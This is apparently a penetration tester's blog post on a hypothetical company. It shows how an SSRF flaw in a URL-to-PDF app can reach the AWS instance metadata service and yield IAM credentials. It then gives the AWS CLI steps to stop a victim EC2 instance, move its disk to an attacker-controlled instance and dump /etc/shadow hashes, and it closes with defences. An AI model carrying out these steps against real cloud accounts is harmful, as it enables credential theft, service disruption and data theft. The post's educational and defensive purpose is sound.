When it all goes wrong on AWS – how an SSRF can lead to full control of your EC2 infrastructure
AWS is an incredibly powerful cloud platform that enables businesses to quickly and efficiently deploy a wide range of software and services to end users. This feature-rich environment does of course increase the attack surface that bad actors have to exploit, especially when combined with lax configurations and poorly designed APIs. In this blog post, I’m going to detail a server-side request forgery (SSRF) vulnerability can be used to steal IAM credentials, how those credentials are commonly misconfigured in order to then take full control over the business’ EC2 and S3 infrastructure, including employee logins and sensitive customer information. And, as any good pentester would, show you what we can learn from this, and what my recommendation would be to the hypothetical company, ACME Corp..
The Application
First, a quick overview of the vulnerable application. The screenshot below shows the app’s main functionality, a PDF generator. It takes a URL and renders the page to a PDF, which it then serves to the user. There are two other links; a home page (which is of no interest to us), and a second link labelled _Manage EC2 Loadbalancing_. The second link is interesting because it implies that the box the app is running on acts as some ad-hoc loadbalancer, and can spin up and terminate other EC2 instances. Sadly, when we visit this endpoint, it returns a 401 with no option to login, so it probably uses IP whitelisting.
Now that we’ve identified an action of interest, we can examine the url2pdf page further. While it’s a simple webpage, the very last words on the page scream SSRF – _”Now with support for intranet URLs”_. To me, this indicates that the page is likely vulnerable to SSRF. As a sanity check, we _could_ check that it generates PDFs for `http://localhost/url2pdf`, but for the sake of brevity I’m going to just assume it’s vulnerable and go right into the exploit.
The Exploit
If we examine the EC2 documentation1, we find that there exists an API called `IMDS`, which can examine the IAM security credentials of the current EC2 instance by accessing the endpoints `iam/info` and `iam/security-credentials/`_`role-name`_.
For the uninitiated, AWS has what’s called Identity and Access Management (IAM) roles, which allow for the delegation of granular authorization (who has access) and authentication (what they can access) to different entities (either AWS services, programs that interact with AWS, or other humans). The authentication is provided by IAM credentials, which are usually either an Account ID and console password, or a set of access keys. The authorization is provided through policies which are a collection of actions that an associated IAM role is allowed to perform, such as StartInstances, StopInstances, CreateBucket, PutObject, etc.. All AWS services have actions associated with them; the previous examples were of EC2 and S3.
The Instance MetaData Service has two versions, IMDSv1 and IMDSv2, both of which are enabled by default. As per the documentation, version 1 of the API can be queried with a simple GET request, as shown below.
curl http://169.254.169.254/latest/meta-data/
While there are many other interesting things we can examine and configure, of particular interest are the endpoints mentioned above, iam/info and iam/security-credentials/role-name.
We first exploit the SSRF vulnerability to render the iam/info endpoint and get the role name, which in this case is ManagementEC2Role. With this, we can steal the actual credentials of the IAM role, as seen below.
As you can see, the endpoint returns the unencrypted credentials of the corresponding IAM role.
The Kill Chain
From here, we can do anything the IAM user can. Since we don’t know the actual policies attached to the instance, it’s a bit of guess work. However, the box likely acts as an ad-hoc EC2 load balancer, so we’ll try a couple EC2 and S3 actions and wrap up an example kill chain.
Our end goal is going to be pulling all the password hashes of the employees on the current EC2 instance. To achieve this, we’re going to create an instance with ssh keys that we control, stop the victim EC2 instance, detach its filesystem (called volumes), and attach it to the instance we control. We do, however, have to ensure our new instance is in the same availability zone as the victim instance, otherwise we can’t mount the volume.
First, we are going to load the access keys into environment variables for the AWS CLI tool.
export AWS_ACCESS_KEY_ID=ASIAYBXI6FGVDSWUPSMX
export AWS_SECRET_ACCESS_KEY=AhfNrgJNfkoXEMrjfE50f51ORkCbUMg7XJ3l2OFU
export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEEEaCXVzLWVhc3QtMiJIMEYCIQC...
Next, we are going to create the ssh keypair and save the private key (the name doesn’t really matter).
aws ec2 create-key-pair --key-name my-key-pair52431 --query "KeyMaterial" --output text > privatekey.pem
chmod 400 privatekey.pem
We then query the volumes, taking note of the volume id and availability zone it’s in.
% aws ec2 describe-volumes
VOLUMES us-east-2b ... vol-0c3ae4bf35679953c
ATTACHMENTS ... i-0771cfc10e67653c7 attached vol-0c3ae4bf35679953c
With this information we can create an EC2 instance with our keypair in the same availability zone as the victim. I’ve used the Ubuntu instance image since it’s in the free tier.
% aws ec2 run-instances --instance-type t2.micro \
--image-id ami-00399ec92321828f5 \
--key-name my-key-pair52431 \
--region us-east-2 \
--placement AvailabilityZone=us-east-2b
553465555370 r-046c82682e525109e
From here, we can stop the victim, and attach its filesystem to the instance we control.
% aws ec2 stop-instances --instance-ids i-0771cfc10e67653c7
STOPPINGINSTANCES i-0771cfc10e67653c7
CURRENTSTATE 64 stopping
PREVIOUSSTATE 16 running
% aws ec2 detach-volume --volume-id vol-0c3ae4bf35679953c
2021-05-13T01:48:19.000Z /dev/sda1 i-0771cfc10e67653c7 detaching vol-0c3ae4bf35679953c
% aws ec2 attach-volume --device /dev/sdz --instance-id i-0f39381f5882c8632 --volume-id vol-0c3ae4bf35679953c
2021-05-13T02:07:49.762Z /dev/sdz i-0f39381f5882c8632 attaching vol-0c3ae4bf35679953c
Then, we simply get the IP address of our new instance, ssh into it, and pull all the hashes.
% aws ec2 describe-instances --instance-ids i-0f39381f5882c8632
...
INSTANCES ... 18.217.153.36 ...
...
% ssh [email protected] -i privatekey.pem
ubuntu@ip-172-31-24-55:~$ sudo mount /dev/xvdz1 /mnt
ubuntu@ip-172-31-24-55:~$ sudo cat /mnt/etc/shadow
root:$6$XbMFNhvmHgLqH7Br$3pEsbmFdSS2s6D3NHwURbqtD6GCMcn6wtpzKZYYS0glBOUFU27axVzBZF4OF/MBKu0W1O9Jx.roxEec3lmlki1:18747:0:99999:7:::
...
alice:$6$tA7Qdo3MXAD6FZa/$XHl1SezRO1Pz0ZV5F54ZGg2IXaim4WYbKuEUF62Ku.RF/.KXejM5CNJtWWwyLJLCLLBkNkBIwtfQGAM7Yeq0t.:18728:0:99999:7:::
bob:$6$biAdYPwVDPuUp7F6$c/ApI93HJE.LKHdGt4GXkXxHXnynbDOKPPcg780jgdWfiSqy.hjxSlCFUfZy9ztk/Ts1nZKUNHKNGdVRweUWP/:1881320:99999:7:::
neil:$6$dp7.Ix6473dRLPvu$AE.aAPtzK0JoOF93K6xst/DHO0k0s7F2FHq7p1hRLQWRo6m30MysMYLP6leUPlGvRVnLTb06Qtf.t/I9rUZ8Y1:18324:0:99999:7:::
ubuntu:$6$gQspv5IJlul7gXQF$V6nj6Fhwg611ojVD8eTzvOh3UKsHTz/THftJj0Ts6jG4ZcwseajoOIvu71KKLbp5FkzQtrK7v23RDFz7W9Jjr.:18712:0:99999:7:::
The cracking of these hashes is an exercise left to the reader.
The Consequences
The possibilities of this attack are endless. With full control of EC2 instances, an actor could do any number of high-severity attacks:
- DoS and take down services
- Inject arbitrary data to what you serve customers
- Use your infrastructure for nefarious purpose (host C2, host illegal content,
- attack from your IPs)
- Pull all user and administrator hashes from an AD domain controller
- Steal confidential intellectual property/trade secrets
- Leak customer information including passwords
In fact, in 2019 this exact exploit was used to steal the user data of more than 100 million users from Capital One2.
The Analysis
So what went wrong? Other than the SSRF vulnerability, there are a number of poor design choices and common misconfigurations that allowed this attack to be as serious as it was.
The first is that IMDSv1 is poorly designed but still enabled by default. AWS was the last of the big three cloud providers to add session-based meta-data retrieval.
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
As you can see, IMDSv2 requires the use of a less common HTTP method to retrieve a token, which eventually expires, and then the request requires a custom header to present the token. These mitigations make SSRF and XXE much much less likely to be able to perform this exploit.
Additionally, the IAM role’s policies are too permissive. Even though the EC2 instance was used as a load balancer, the attaching and detaching of volumes wasn’t needed to perform its duties. In fact, the two policies attached to it looked like this:
{ | {
"Version": "2012-10-17", | "Version": "2012-10-17",
"Statement": [ | "Statement": [
{ | {
"Effect": "Allow", | "Effect": "Allow",
"Action": "ec2:*", | "Action": "s3:*",
"Resource": "*" | "Resource": "*"
} | }
] | }
} | }
This is actually a pretty common misconfiguration. Time is money; creating a well thought out policy takes time and knowledge, so it’s often quicker and easier to just allow all actions on all resources. However, there are serious dangers associated with allowing all actions of AWS services. For s3:* on all resources, an actor (or even rouge employee) has total control of all your cloud storage. As shown above, ec2:* on all EC2 resources gives control over all EC2 instances, and the attached filesystems. If a policy as cloudwatch:* as the action, the IAM role can access and delete any security logs and alarms set for protecting you AWS infrastructure, allowing them to go undetected.
Each of these pose a threat to the security and integrity of your AWS infrastructure.
The Defence
We can adopt a defence-in-depth strategy to mitigate the risk of this attack occurring on our AWS infrastructure.
Firstly, we can disable IMDSv1. See the AWS IMDS documentation[^3] for more info.
Next, we design the IAM policies to be as restrictive as possible without affecting the functionality of the application, also known as the least privilege principal. Of course, this takes time to develop, and therefore additional development costs, but is ultimately worth it. See the IAM best practices[^4] for more info.
Another best practice measure is to enable multi-factor authentication on all IAM users. While it won’t prevent this attack – we steal temporary STS credentials and not the full IAM access keys – it will make using leaked IAM credentials much harder, as an actor needs the secondary access token. This can be an authenticator app like Google Authenticator, a third-party time-based OTP token, or, for the AWS web console, a YubiKey.
Finally, we can enable CloudWatch to monitor and log AWS actions. This is very infrastructure specific, so see the CloudWatch documentation[^5] for more info.
Footnotes
[^1]: [Instance metadata and user data](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)
[^2]: [Capital One Data Breach](https://krebsonsecurity.com/2019/07/capital-one-data-theft-impacts-106m-people/)
[^3]: [IMDS documentation](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html#configuring-instance-metadata-options)
[^4]: [IAM Best Practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html#grant-least-privilege)
[^5]: [What is Amazon CloudWatch?](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html)